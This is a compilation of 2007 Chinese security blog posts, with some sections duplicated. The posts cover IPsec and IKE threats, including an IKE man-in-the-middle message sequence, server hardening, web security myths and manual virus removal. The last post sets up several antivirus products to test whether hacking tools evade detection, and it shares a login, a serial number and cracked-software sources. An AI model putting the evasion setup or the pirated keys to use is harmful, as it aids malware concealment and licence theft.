(2)数据完整验证:通过验证保证数据从原发地到目的地的传送过程中没有任何不可检测的数据丢失与改变。
(3)保密:使相应的接收者能获取发送的真正内容,而无关的接收者无法获知数据的真正内容。
IPv6下对网络安全的威胁
针对密码攻击的分析
基于密码的攻击很具有生命力,在IPv6环境下同样面临着这样的威胁。虽然在网络IPv6下IPsec是强制实施的,但是在这种情况下,用户使用的操作系统与其他访问控制的共同之处就是基于密码进行访问控制。对计算机与网络资源的访问都是由用户名与密码决定的。对那些版本较老的操作系统,有些组件不是在通过网络传输标识信息进行验证时就对该信息加以保护,这样窃听者能够获取有效的用户名与密码,就拥有了与实际用户同样的权限。攻击者就可以进入到机器内部进行恶意破坏。
针对泄漏密钥攻击的分析
IPv6下IPsec工作的两种模式(传输模式和隧道模式)都需要密钥交换这样的过程,因此对密钥的攻击仍然具有威胁。尽管对于攻击者来说确定密钥是一件艰难而消耗资源的过程,但是这种可能性实实在在存在。当攻击者确定密钥之后,攻击者使用泄露密钥便可获取对于安全通信的访问权,而发送者或接收者却全然没有察觉攻击,后面所进行的数据传输等等遭到没有抵抗的攻击。进而,攻击者使用泄露密钥即可解密或修改其他需要的数据。同样攻击者还会试图使用泄露密钥计算其它密钥,从而使其获取对其它安全通信的访问权。
针对应用层服务攻击
应用程序层攻击的目标是应用程序服务器,即导致服务器的操作系统或应用程序出错。这会使攻击者有能力绕过正常访问控制。攻击者利用这一点便可控制应用程序、系统或网络,并可进行下列任意操作:读取、添加、删除或修改数据或操作系统 ;引入病毒,即使用计算机与软件应用程序将病毒复制到整个网络;引入窃探器来分析网络与获取信息,并最终使用这些信息导致网络停止响应或崩溃;异常关闭数据应用程序或操作系统;禁用其它安全控制以备日后攻击。
由于IPsec在网络层进行数据包加密,在网络传输过程中防火墙无法有效地将加密的带有病毒的数据包进行有效的监测,这样就对接收端的主机或路由器构成了威胁。
可能发生的拒绝服务攻击
密钥管理分为手工密钥管理和自动密钥管理。Internet密钥管理协议被定位在应用程序的层次,IETF规定了Internet安全协议和密钥管理协议ISAKMP(Internet Security Association and Key Management Protocol) 来实现IPSec的密钥管理需求, 为身份验证的SA 设置以及密钥交换技术定义了一个通用的结构, 可以使用不同的密钥交换技术;IETF还设计了OA KL EY密钥确定协议(Key Determination Protocol) 来实施ISAKMP的具体功能, 其主要目的是使需要保密通信的双方能够通过这个协议证明自己的身份、认证对方的身份、确定采用的加密算法和通信密钥, 从而建立起安全的通信连接。
对IPsec最主要的难应用性在于它们所强化的系统的复杂性和缺乏清晰性。IPsec中包含太多的选项和太多的灵活性。对于相同的或者类似的情况常常有多种做法。
IKE的协议容易受到拒绝服务攻击。攻击者可以在因特网初始化许多连接请求就可以做到,这时服务器将会维护这些恶意的“小甜饼”。
加密是有代价的。进行模数乘幂运算,或计算两个非常大的质数的乘积,甚至对单个数据包进行解密和完整性查验,都会占用cpu的时间。发起攻击的代价远远小于被攻击对象响应这种攻击所付出的代价。例如,甲想进行一次Diffie-Hellman密钥交换,但mallory向她发送了几千个虚假的Diffie-Hellman公共值,其中全部填充伪造的返回地址。这样乙被动地进入这种虚假的交换。显然会造成cpu的大量浪费。
IPsec对相应的攻击提出了相应的对策。但它并不是通过抵挡服务否认攻击来进行主动防御,只是增大了发送这种垃圾包的代价及复杂度,来进行一种被动防御。
但是攻击者仍然可以利用IKE协议的漏洞从而使服务中断。
以下是基于签名的IKE阶段1主模式的认证失败(如图4所示)。
(Malice 对I使用他的真实身份信息,而对R则冒充I)
1. I到Malice:HDRI,SAI;
1’Malice(“I”)到R:HDRI,SAI;
2’R到Malice(“I”):HDRR,SAR;
2.Malice到I:HDRR,SAR;
3.I到Malice:HDRI,gx,NI;
3’Malice(“I”)到R:HDRI,gx,NI;
4’R到Malice(“I”):HDRR,gy,NR;
4.Malice到I:HDRR,gy,NR;
5.I到Malice:HDRI,{IDI,CertI,SigI}gxy?;
5’Malice(“I”)到R:HDRI,{IDI,CertI,SigI}gxy;
6’R到Malice(“I”):HDRR,{IDR,CertR,SigR}gxy;
6. Dropped。
这样,R认为刚才和他对话并和他共享会话密钥的是I,而I却认为刚才是和Malice进行了一次不成功的通信。R根本不会被通知存在任何异常,并且也许会拒绝来自I的服务;实际上R进入了这样一种状态,只接受来自I的服务请求(也许直到“超时”后,R才会脱离这样的状态。)
面对越来越多的网络安全问题,唯有各种安全协议有效地结合起来使用才会降低攻击的可能性。由于IPsec是IPv6下强制使用的,加上网络层加密的特殊优点,把工作于IP层的IPsec和其他的安全协议(SSL等)结合起来可以将网络安全的质量提高到更高的一个水平。但是同时道高一尺,魔高一丈,新的安全问题会接踵而至,对于协议的漏洞,要先知先觉,这样才会未雨绸缪,防患于未然。
网络高手眼中的网络安全 日常防护尤为必要
[ 2007-03-25 03:50:59 | 作者: sun ]
近期读了一些关于网络入侵的文章,感觉到增强网络安全是一项日常性的工作,并不是说网络设备、服务器配置好了就绝对安全了,操作系统和一些软件的漏洞是不断被发现的,比如冲击波、震荡波病毒就是利用系统漏洞,同样利用这些漏洞可以溢出得到系统管理员权限, server-U的提升权限漏洞也可以被利用。在这些漏洞未被发现前,我们觉得系统是安全的,其实还是不安全的,也许漏洞在未公布前已经被部分hacker 所知,也就是说系统和应用软件我们不知道还会存在什么漏洞,那么日常性的防护就显得尤为必要。
一、做好基础性的防护工作,服务器安装干净的操作系统,不需要的服务一律不装,多一项就多一种被入侵的可能性,打齐所有补丁,微软的操作系统当然推荐WIN2K3,性能和安全性比WIN2K都有所增强,选择一款优秀的杀毒软件,至少能对付大多数木马和病毒 的,安装好杀毒软件,设置好时间段自动上网升级,设置好帐号和权限,设置的用户尽可能的少,对用户的权限尽可能的小,密码设置要足够强壮。对于MSSQL,也要设置分配好权限,按照最小原则分配。最好禁用xp_cmdshell。有的网络有硬件防火墙,当 然好,但仅仅依靠硬件防火墙,并不能阻挡hacker的攻击,利用反向连接型的木马和其他的办法还是可以突破硬件防火墙的阻挡。WIN2K3系统自带的防火墙功能还不够强大,建议打开,但还需要安装一款优秀的软件防火墙保护系统,我一般习惯用ZA,论坛有 很多教程了。对于对互联网提供服务的服务器,软件防火墙的安全级别设置为最高,然后仅仅开放提供服务的端口,其他一律关闭,对于服务器上所有要访问网络的程序,现在防火墙都会给予提示是否允许访问,根据情况对于系统升级,杀毒软件自动升级等有必要访问外网 的程序加到防火墙允许访问列表。那么那些反向连接型的木马就会被防火墙阻止,这样至少系统多了一些安全性的保障,给hacker入侵就多一些阻碍。网络上有很多基础型的防护资料,大家可以查查相关服务器安全配置方面的资料。
二、修补所有已知的漏洞,未知的就没法修补了,所以要养成良好的习惯,就是要经常去关注。了解自己的系统,知彼知己,百战百胜。所有补丁是否打齐,比如mssql,server-U,论坛程序是否还有漏洞,每一个漏洞几乎都是致命的,系统开了哪些服务,开了哪些端口,目前开的这些服务中有没有漏洞可以被黑客应用,经常性的了解当前黑客攻击的手法和可以被利用的漏洞,检查自己的系统中是否存在这些漏洞。比如SQL注入漏洞,很多网站 都是因为这个服务器被入侵,如果我们作为网站或者服务器的管理者,我们就应该经常去关注这些技术,自己经常可以用一些安全性扫描工具检测检测,比如X- scan,snamp, nbsi,PHP注入检测工具等,或者是用当前比较流行的hacker入侵工具检测自己的系统是否存在漏洞,这得针对自己的系统开的服务去检测,发现漏洞及时修补。网络管理人员不可能对每一方面都很精通,可以请精通的人员帮助检测,当然对于公司来说,如果 系统非常重要,应该请专业的安全机构来检测,毕竟他们比较专业。
三、服务器的远程管理,相信很多人都喜欢用server自带的远程终端,我也喜欢,简洁速度快。但对于外网开放的服务器来说,就要谨慎了,要想到自己能用,那么这个端口就对外开放了,黑客也可以用,所以也要做一些防护了。一就是用证书策略来限制访问者,给 TS配置安全证书,客户端访问需要安全证书。二就是限制能够访问服务器终端服务的IP地址。三是可以在前两者的基础上再把默认的3389端口改一下。当然也可以用其他的远程管理软件pcanywhere也不错。
四、另外一个容易忽视的环节是网络容易被薄弱的环节所攻破,服务器配置安全了,但网络存在其他不安全的机器,还是容易被攻破,“千里之堤,溃于蚁穴 ”。利用被控制的网络中的一台机器做跳板,可以对整个网络进行渗透攻击,所以安全的配置网络中的机器也很必要。说到跳板攻击,水平稍高一点的hacker攻击一般都会隐藏其真实IP,所以说如果被入侵了,再去追查的话是很难成功的。Hacker利用控制的肉鸡,肉鸡一般都是有漏洞被完全控制的计算机,安装了一些代理程序或者黑客软件,比如DDOS攻击软件,跳板程序等,这些肉鸡就成为黑客的跳板,从而隐藏了真实IP。
五、最后想说的是即使大家经过层层防护,系统也未必就绝对安全了,但已经可以抵挡一般的hacker的攻击了。连老大微软都不能说他的系统绝对安全。系统即使只开放80端口, 如果服务方面存在漏洞的话,水平高的hacker还是可以钻进去,所以最关键的一点我认为还是关注最新漏洞,发现就要及时修补。“攻就是防,防就是攻” ,这个观点我比较赞同,我说的意思并不是要去攻击别人的网站,而是要了解别人的攻击手法,更好的做好防护。比如不知道什么叫克隆管理员账号,也许你的机器已经被入侵并被克隆了账号,可能你还不知道呢?如果知道有这种手法,也许就会更注意这方面。自己的网站 如果真的做得无漏洞可钻,hacker也就无可奈何了。
希望大家有好的思路和经验能够多探讨探讨,要做好网络安全还有很多细节需要注意,一个微小的疏忽都可能导致功亏一篑
.
一、做好基础性的防护工作,服务器安装干净的操作系统,不需要的服务一律不装,多一项就多一种被入侵的可能性,打齐所有补丁,微软的操作系统当然推荐WIN2K3,性能和安全性比WIN2K都有所增强,选择一款优秀的杀毒软件,至少能对付大多数木马和病毒 的,安装好杀毒软件,设置好时间段自动上网升级,设置好帐号和权限,设置的用户尽可能的少,对用户的权限尽可能的小,密码设置要足够强壮。对于MSSQL,也要设置分配好权限,按照最小原则分配。最好禁用xp_cmdshell。有的网络有硬件防火墙,当 然好,但仅仅依靠硬件防火墙,并不能阻挡hacker的攻击,利用反向连接型的木马和其他的办法还是可以突破硬件防火墙的阻挡。WIN2K3系统自带的防火墙功能还不够强大,建议打开,但还需要安装一款优秀的软件防火墙保护系统,我一般习惯用ZA,论坛有 很多教程了。对于对互联网提供服务的服务器,软件防火墙的安全级别设置为最高,然后仅仅开放提供服务的端口,其他一律关闭,对于服务器上所有要访问网络的程序,现在防火墙都会给予提示是否允许访问,根据情况对于系统升级,杀毒软件自动升级等有必要访问外网 的程序加到防火墙允许访问列表。那么那些反向连接型的木马就会被防火墙阻止,这样至少系统多了一些安全性的保障,给hacker入侵就多一些阻碍。网络上有很多基础型的防护资料,大家可以查查相关服务器安全配置方面的资料。
二、修补所有已知的漏洞,未知的就没法修补了,所以要养成良好的习惯,就是要经常去关注。了解自己的系统,知彼知己,百战百胜。所有补丁是否打齐,比如mssql,server-U,论坛程序是否还有漏洞,每一个漏洞几乎都是致命的,系统开了哪些服务,开了哪些端口,目前开的这些服务中有没有漏洞可以被黑客应用,经常性的了解当前黑客攻击的手法和可以被利用的漏洞,检查自己的系统中是否存在这些漏洞。比如SQL注入漏洞,很多网站 都是因为这个服务器被入侵,如果我们作为网站或者服务器的管理者,我们就应该经常去关注这些技术,自己经常可以用一些安全性扫描工具检测检测,比如X- scan,snamp, nbsi,PHP注入检测工具等,或者是用当前比较流行的hacker入侵工具检测自己的系统是否存在漏洞,这得针对自己的系统开的服务去检测,发现漏洞及时修补。网络管理人员不可能对每一方面都很精通,可以请精通的人员帮助检测,当然对于公司来说,如果 系统非常重要,应该请专业的安全机构来检测,毕竟他们比较专业。
三、服务器的远程管理,相信很多人都喜欢用server自带的远程终端,我也喜欢,简洁速度快。但对于外网开放的服务器来说,就要谨慎了,要想到自己能用,那么这个端口就对外开放了,黑客也可以用,所以也要做一些防护了。一就是用证书策略来限制访问者,给 TS配置安全证书,客户端访问需要安全证书。二就是限制能够访问服务器终端服务的IP地址。三是可以在前两者的基础上再把默认的3389端口改一下。当然也可以用其他的远程管理软件pcanywhere也不错。
四、另外一个容易忽视的环节是网络容易被薄弱的环节所攻破,服务器配置安全了,但网络存在其他不安全的机器,还是容易被攻破,“千里之堤,溃于蚁穴 ”。利用被控制的网络中的一台机器做跳板,可以对整个网络进行渗透攻击,所以安全的配置网络中的机器也很必要。说到跳板攻击,水平稍高一点的hacker攻击一般都会隐藏其真实IP,所以说如果被入侵了,再去追查的话是很难成功的。Hacker利用控制的肉鸡,肉鸡一般都是有漏洞被完全控制的计算机,安装了一些代理程序或者黑客软件,比如DDOS攻击软件,跳板程序等,这些肉鸡就成为黑客的跳板,从而隐藏了真实IP。
五、最后想说的是即使大家经过层层防护,系统也未必就绝对安全了,但已经可以抵挡一般的hacker的攻击了。连老大微软都不能说他的系统绝对安全。系统即使只开放80端口, 如果服务方面存在漏洞的话,水平高的hacker还是可以钻进去,所以最关键的一点我认为还是关注最新漏洞,发现就要及时修补。“攻就是防,防就是攻” ,这个观点我比较赞同,我说的意思并不是要去攻击别人的网站,而是要了解别人的攻击手法,更好的做好防护。比如不知道什么叫克隆管理员账号,也许你的机器已经被入侵并被克隆了账号,可能你还不知道呢?如果知道有这种手法,也许就会更注意这方面。自己的网站 如果真的做得无漏洞可钻,hacker也就无可奈何了。
希望大家有好的思路和经验能够多探讨探讨,要做好网络安全还有很多细节需要注意,一个微小的疏忽都可能导致功亏一篑
.
你的网络安全吗?需要澄清的五个误解
[ 2007-03-25 03:50:46 | 作者: sun ]
目前,黑客攻击已成为一个很严重的网络问题。许多黑客甚至可以突破SSL加密和各种防火墙,攻入Web网站的内部,窃取信息。黑客可以仅凭借浏览器和几个技巧,即套取Web网站的客户信用卡资料和其它保密信息。
随着防火墙和补丁管理已逐渐走向规范化,各类网络设施应该是比以往更完全。但不幸的是,道高一尺,魔高一丈,黑客们已开始直接在应用层面
对Web网站下手。市场研究公司Gartner的分析师指出,目前有70%的黑客袭击事件都发生在应用程序方面。要增强Web网站的安全性,首先要澄清五个误解。
一、“Web网站使用了SSL加密,所以很安全”
单靠SSL加密无法保障网站的安全。网站启用SSL加密后,表明该网站发送和接收的信息都经过了加密处理,但是SSL无法保障存储在网站里的信息的安全。许多网站采用了128位SSL加密,但还是被黑客攻破。此外,SSL也无法保护网站访问者的隐私信息。这些隐私信息直接存在网站服务器里面,这是SSL所无法保护的。
二、“Web网站使用了防火墙,所以很安全”
防火墙有访问过滤机制,但还是无法应对许多恶意行为。许多网上商店、拍卖网站和BBS都安装了防火墙,但依然脆弱。防火墙通过设置“访客名单”,可以把恶意访问排除在外,只允许善意的访问者进来。但是,如何鉴别善意访问和恶意访问是一个问题。访问一旦被允许,后续的安全问题就不是防火墙能应对了。
三、“漏洞扫描工具没发现任何问题,所以很安全”
自1990年代初以来,漏洞扫描工具已经被广泛使用,以查找一些明显的网络安全漏洞。但是,这种工具无法对网站应用程序进行检测,无法查找程序中的漏洞。
漏洞扫描工具生成一些特殊的访问请求,发送给Web网站,在获取网站的响应信息后进行分析。该工具将响应信息与一些漏洞进行对比,一旦发现可疑之处即报出安全漏洞。目前,新版本的漏洞扫描工具一般能发现网站90%以上的常见安全问题,但这种工具对网站应用程序也有很多无能为力的地方。
四、“网站应用程序的安全问题是程序员造成的”
程序员确实造成了一些问题,但有些问题程序员无法掌控。
比如说,应用程序的源代码可能最初从其它地方获得,这是公司内部程序开发人员所不能控制的。或者,公司可能会请一些离岸的开发商作一些定制开发,与原有程序整合,这其中也可能会出现问题。或者,一些程序员会拿来一些免费代码做修改,这也隐藏着安全问题。再举一个极端的例子,可能有两个程序员来共同开发一个程序项目,他们分别开发的代码都没有问题,安全性很好,但整合在一起则可能出现安全漏洞。
很现实地讲,软件总是有漏洞的,这种事每天都在发生。安全漏洞只是众多漏洞中的一种。加强员工的培训,确实可以在一定程度上改进代码的质量。但需要注意,任何人都会犯错误,漏洞无可避免。有些漏洞可能要经过许多年后才会被发现。
五、“我们每年会对Web网站进行安全评估,所以很安全”
一般而言,网站应用程序的代码变动很快。对Web网站进行一年一度的安全评估非常必要,但评估时的情况可能与当前情况有很大不同。网站应用程序只要有任何改动,都会出现安全问题的隐患。
网站喜欢选在节假日对应用程序进行升级,圣诞节就是很典型的一个旺季。网站往往会增加许多新功能,但却忽略了安全上的考虑。如果网站不增加新功能,这又会对经营业绩产生影响。网站应该在程序开发的各个阶段都安排专业的安全人员。
一、中毒的一些表现
我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不到了、数据丢失等等,就是中毒的一些征兆。
二、中毒诊断
1、按Ctrl+Shift+Ese键(同时按此三键),调出windows任务管理器查看系统运行的进程,找出不熟悉进程并记下其名称(这需要经验),如果这些进程是病毒的话,以便于后面的清除。暂时不要结束这些进程,因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,此时电脑中毒的可能性是95%。
2、查看windows当前启动的服务项,由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言,正常的windows服务,基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外),此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称,假如其名称和路径为C:winntsystem32explored.exe,计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边,中间有一纵向的滚动条,而右边为空白,再双击添加/删除程序或管理工具,窗体内是空的,这是病毒文件winhlpp32.exe发作的特性。
3、运行注册表编辑器,命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面几个RunOnce等,查看窗体右侧的项值,看是否有非法的启动项。WindowsXp运行msconfig也起相同的作用。随着经验的积累,你可以轻易的判断病毒的启动项。
4、用浏览器上网判断。前一阵发作的Gaobot病毒,可以上yahoo.com,sony.com等网站,但是不能访问诸如www.symantec.com,www.ca.com这样著名的安全厂商的网站,安装了symantecNorton2004的杀毒软件不能上网升级。
5、取消隐藏属性,查看系统文件夹winnt(windows)system32,如果打开后文件夹为空,表明电脑已经中毒;打开system32后,可以对图标按类型排序,看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;driversetc下的文件hosts是病毒喜欢篡改的对象,它本来只有700字节左右,被篡改后就成了1Kb以上,这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。
6、由杀毒软件判断是否中毒,如果中毒,杀毒软件会被病毒程序自动终止,并且手动升级失败。
三、灭毒
1、在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值,删除之。当成系统服务启动的病毒程序,会在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身,找到之后一并消灭。
2、停止有问题的服务,改自动为禁止。
3、如果文件system32driversetchosts被篡改,恢复它,即只剩下一行有效值“127.0.0.1localhost”,其余的行删除。再把host设置成只读。
4、重启电脑,摁F8进“带网络的安全模式”。目的是不让病毒程序启动,又可以对Windows升级打补丁和对杀毒软件升级。
5、搜索病毒的执行文件,手动消灭之。
6、对Windows升级打补丁和对杀毒软件升级。
7、关闭不必要的系统服务,如remoteregistryservice。
8、第6步完成后用杀毒软件对系统进行全面的扫描,剿灭漏网之鱼。
9、上步完成后,重启计算机,完成所有操作。
还有另一种查毒的方法:
启动好后 什也不要打开 在“开始——运行——cmd——netstat -a -n -o ”,看看有什么进程在通信 那个进程90%就是病毒或木马了
我们怎样知道电脑中病毒了呢?其实电脑中毒跟人生病一样,总会有一些明显的症状表现出来。例如机器运行十分缓慢、上不了网、杀毒软件生不了级、word文档打不开,电脑不能正常启动、硬盘分区找不到了、数据丢失等等,就是中毒的一些征兆。
二、中毒诊断
1、按Ctrl+Shift+Ese键(同时按此三键),调出windows任务管理器查看系统运行的进程,找出不熟悉进程并记下其名称(这需要经验),如果这些进程是病毒的话,以便于后面的清除。暂时不要结束这些进程,因为有的病毒或非法的进程可能在此没法结束。点击性能查看CPU和内存的当前状态,如果CPU的利用率接近100%或内存的占用值居高不下,此时电脑中毒的可能性是95%。
2、查看windows当前启动的服务项,由“控制面板”的“管理工具”里打开“服务”。看右栏状态为“启动”启动类别为“自动”项的行;一般而言,正常的windows服务,基本上是有描述内容的(少数被骇客或蠕虫病毒伪造的除外),此时双击打开认为有问题的服务项查看其属性里的可执行文件的路径和名称,假如其名称和路径为C:winntsystem32explored.exe,计算机中招。有一种情况是“控制面板”打不开或者是所有里面的图标跑到左边,中间有一纵向的滚动条,而右边为空白,再双击添加/删除程序或管理工具,窗体内是空的,这是病毒文件winhlpp32.exe发作的特性。
3、运行注册表编辑器,命令为regedit或regedt32,查看都有那些程序与windows一起启动。主要看Hkey_Local_MachineSoftwareMicroSoftWindowsCurrentVersionRun和后面几个RunOnce等,查看窗体右侧的项值,看是否有非法的启动项。WindowsXp运行msconfig也起相同的作用。随着经验的积累,你可以轻易的判断病毒的启动项。
4、用浏览器上网判断。前一阵发作的Gaobot病毒,可以上yahoo.com,sony.com等网站,但是不能访问诸如www.symantec.com,www.ca.com这样著名的安全厂商的网站,安装了symantecNorton2004的杀毒软件不能上网升级。
5、取消隐藏属性,查看系统文件夹winnt(windows)system32,如果打开后文件夹为空,表明电脑已经中毒;打开system32后,可以对图标按类型排序,看有没有流行病毒的执行文件存在。顺便查一下文件夹Tasks,wins,drivers.目前有的病毒执行文件就藏身于此;driversetc下的文件hosts是病毒喜欢篡改的对象,它本来只有700字节左右,被篡改后就成了1Kb以上,这是造成一般网站能访问而安全厂商网站不能访问、著名杀毒软件不能升级的原因所在。
6、由杀毒软件判断是否中毒,如果中毒,杀毒软件会被病毒程序自动终止,并且手动升级失败。
三、灭毒
1、在注册表里删除随系统启动的非法程序,然后在注册表中搜索所有该键值,删除之。当成系统服务启动的病毒程序,会在Hkey_Local_MachineSystemControlSet001services和controlset002services里藏身,找到之后一并消灭。
2、停止有问题的服务,改自动为禁止。
3、如果文件system32driversetchosts被篡改,恢复它,即只剩下一行有效值“127.0.0.1localhost”,其余的行删除。再把host设置成只读。
4、重启电脑,摁F8进“带网络的安全模式”。目的是不让病毒程序启动,又可以对Windows升级打补丁和对杀毒软件升级。
5、搜索病毒的执行文件,手动消灭之。
6、对Windows升级打补丁和对杀毒软件升级。
7、关闭不必要的系统服务,如remoteregistryservice。
8、第6步完成后用杀毒软件对系统进行全面的扫描,剿灭漏网之鱼。
9、上步完成后,重启计算机,完成所有操作。
还有另一种查毒的方法:
启动好后 什也不要打开 在“开始——运行——cmd——netstat -a -n -o ”,看看有什么进程在通信 那个进程90%就是病毒或木马了
一系统安装多杀毒软件
[ 2007-03-25 03:50:20 | 作者: sun ]
本来、打算做教程了,一想做教程不好发表,所以就写了这个,希望对大家有帮助
前几天为了做免杀的需要,所以得安几个杀毒软件
目前比较流行的也就是江民,瑞星,金山,卡巴,这四个,其他的感觉都不怎么
地,所以不考虑了,不过在安装的时候出现了一个问题,就是都装上重起电脑之后
江民的语言选择里面没有简体中文了,这个挺郁闷的,不过最郁闷的还在后面,拨
号上网后,QQ上不去,网页打不开,PING也不通,用netstat命令查看网络状态一
看,竟然所有端口的连接都不正常,这可郁闷坏我了,重新做一次系统,多个心眼
用GHOST做个备份(以前的也有备份,不过系统里装的东西过时了```)然后试了拨
号,一切都正常,呵呵,这回先到网上查查看有没有相关的资料,当然是百度了,
不过什么也没有找到,没这方面的问题介绍,郁闷中……
没办法,自己琢磨了,我们GO ON吧,这回一个一个装,装了江民,没问题,
又装了卡巴,也没问题,又装金山,晕,出问题了````,还是老问题,上不去网了
没办法,用GHOST恢复系统吧,接下来试的就别提了,试了3个多小时,最后下定了
结论,是金山的问题,思考一下,到底是什么问题呢,莫非系统文件冲突,那么就
少装一些项目,装的时候少选几项试试,又用了1个多小时,问题终于找到了`````
原来是金山网标的问题,一想想,肯定是金山网标与其他的杀毒软件防火墙有冲突
问题找到了,这回可以好好装了,恢复系统,装杀毒软件,终于行了~~~太兴奋了`
终于成功了```下面就给大家写一下关与安装多个杀毒软件的方法吧,首先必须
说明的是,安装完一个杀毒软件之后必须设置开机禁止启动,因为如果电脑开机启
动多个杀毒软件会很卡的,而且有时候反应很慢,更严重的是会引起系统蓝屏或崩溃
建议大家最后装卡巴,为什么?自己试试就知道了````。
江民的设置:打开主程序(KV2006),点操作台切换,恢复窗口,工具→设置→
实时监控,把所有开机启动的项目全部去掉,确定。
瑞星的设置:打开主程序(瑞星杀毒软件),设置→详细设置→瑞星监控中心,
把所有开机启动的项目去掉,确定。
金山的设置:打开主程序(金山毒霸2006),工具→综合设置→防毒设置→用户
自定义→文件实时防毒/邮件监控/网页安全扫描(把启动的项目的钩去掉)确定。
在这里要说明一点,在文件实时防毒的页面,把发现病毒时的处理方式改为禁止访问
该文件,否则你的黑软会一下子全没了```我以前就知道,不过我朋友前一段时间就
忘了,结果可想而知了```害得他整整郁闷了一个星期~。
卡巴的设置:打开主程序(版本很多,主程序名我也不好说),设置→接下来的
自己找吧,版本太多了,每个都不一样```我也说不清楚。
当然你要想机器平时用的方便,设置更多了,比如江民,瑞星,金山都有自带的
小精灵,小护士,助手什么的,最好别让他们工作,很讨厌(这个词不光女孩子能用
哦,嘿嘿~)。
接下来要提醒大家,如果是搞黑客技术的,最好用GHOST多做几个备份(什么?
不会用GHOST?往下看吧),因为用的软件多了装的太多机器肯定很卡的,这点大家
应该有同感~
至于GHOST的用法(最好自己去网上查,说的比较详细),如果大家不会用DOS,
那就用矮人DOS工具箱5.0,傻瓜化的,适合对DOS不太了解的人`
这里说明大家安装江民后出现的一个严重问题,就是每次开机都扫描硬盘,我看
过网上对这方面的介绍,都不全,而且有一点没有说到,在这里说一下,解决方法是
打开江民的设置选项→扫描选项→其他动作,把四个项目的钩都去掉(每个选项的作
用大家都能读明白吧,我就不详细说了),然后确定,之后打开注册表(单击“开始
→运行”,在“运行”对话框中输入“regedit”打开注册表编辑器)依次选择
“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager”然
后在右侧窗口中找到“BootExecute”键值项,右键选择修改,里面数值是
autocheck autochk *
KvNative.exe
把KvNative.exe去掉然后点确定,F5刷新就可以了,以后就不会启动江民自带的开机
扫描了。
大家知道电脑非正常关机的情况下重起电脑以后也会开机扫描,这是很正常的,如果
以后永远不想让电脑开机扫描就把里面的数值全部清空,确定,F5刷新,就可以了
不过建议大家先备份一下注册表再清空里面的数据(因为如果电脑经常非正常关机而
且不开机扫描硬盘,那么会造成硬盘数据破坏后无法删除!),不过清空了也没关系
我们可以用chkdsk命令来强迫电脑开机扫描硬盘,至于chkdsk命令的用法大家就到网
上自己查吧。
最后就是免费升级杀毒软件了
江民:通行证帐号:sphack 密码:sphack 密码改了我也能找回来,因为我知道
用的人多了,升级次数多了,自然就不能升级了,建议大家2天升级一次吧,还有就是
我会陆续更新新的江民通行证,请留意http://www.sphack.cn,谢谢大家支持。
瑞星:序列号: T1BULQ-70AWDE-9P90SF-7TD200?用户ID:RB2NA22T
注意大家千万别点自动升级,因为点自动升级之后就不能用了,大家用瑞星升级保姆
吧,这个保姆是随时更新的,保证用户可以免费升级~下载地址请关注天天杀毒网
http://www.sdday.com,这里有你想要的东东,看了绝对不后悔~
金山:天天杀毒网有破解版的金山2006,如果想用正版的,需要通行证和密码,
不过由于本通行证不随便对外公开,所以暂时不提供。
卡巴:这个好弄,网上到处都有下载,而且有序列号,不过建议大家到天天杀毒网
去下载,因为那里保证下载的东东没问题(现在网络可不安全,危险随时都在),声明
啊,我可不是给天天杀毒网做广告,他可不给我任何好处,只是感觉这个网站有用的东
西太多了。。。
最后给计算机/网络技术初学者一句话,就是遇到问题的时候别总想着去问别人,
自己养成用搜索引擎找答案的习惯,曾经我记得黑客基地的一个VIP会员说过,百度是
你最好的老师~每当我遇到问题的时候,总会想起这句话。
好了,就写这么多吧,打字打的手都酸了,GOOD LUCK !
前几天为了做免杀的需要,所以得安几个杀毒软件
目前比较流行的也就是江民,瑞星,金山,卡巴,这四个,其他的感觉都不怎么
地,所以不考虑了,不过在安装的时候出现了一个问题,就是都装上重起电脑之后
江民的语言选择里面没有简体中文了,这个挺郁闷的,不过最郁闷的还在后面,拨
号上网后,QQ上不去,网页打不开,PING也不通,用netstat命令查看网络状态一
看,竟然所有端口的连接都不正常,这可郁闷坏我了,重新做一次系统,多个心眼
用GHOST做个备份(以前的也有备份,不过系统里装的东西过时了```)然后试了拨
号,一切都正常,呵呵,这回先到网上查查看有没有相关的资料,当然是百度了,
不过什么也没有找到,没这方面的问题介绍,郁闷中……
没办法,自己琢磨了,我们GO ON吧,这回一个一个装,装了江民,没问题,
又装了卡巴,也没问题,又装金山,晕,出问题了````,还是老问题,上不去网了
没办法,用GHOST恢复系统吧,接下来试的就别提了,试了3个多小时,最后下定了
结论,是金山的问题,思考一下,到底是什么问题呢,莫非系统文件冲突,那么就
少装一些项目,装的时候少选几项试试,又用了1个多小时,问题终于找到了`````
原来是金山网标的问题,一想想,肯定是金山网标与其他的杀毒软件防火墙有冲突
问题找到了,这回可以好好装了,恢复系统,装杀毒软件,终于行了~~~太兴奋了`
终于成功了```下面就给大家写一下关与安装多个杀毒软件的方法吧,首先必须
说明的是,安装完一个杀毒软件之后必须设置开机禁止启动,因为如果电脑开机启
动多个杀毒软件会很卡的,而且有时候反应很慢,更严重的是会引起系统蓝屏或崩溃
建议大家最后装卡巴,为什么?自己试试就知道了````。
江民的设置:打开主程序(KV2006),点操作台切换,恢复窗口,工具→设置→
实时监控,把所有开机启动的项目全部去掉,确定。
瑞星的设置:打开主程序(瑞星杀毒软件),设置→详细设置→瑞星监控中心,
把所有开机启动的项目去掉,确定。
金山的设置:打开主程序(金山毒霸2006),工具→综合设置→防毒设置→用户
自定义→文件实时防毒/邮件监控/网页安全扫描(把启动的项目的钩去掉)确定。
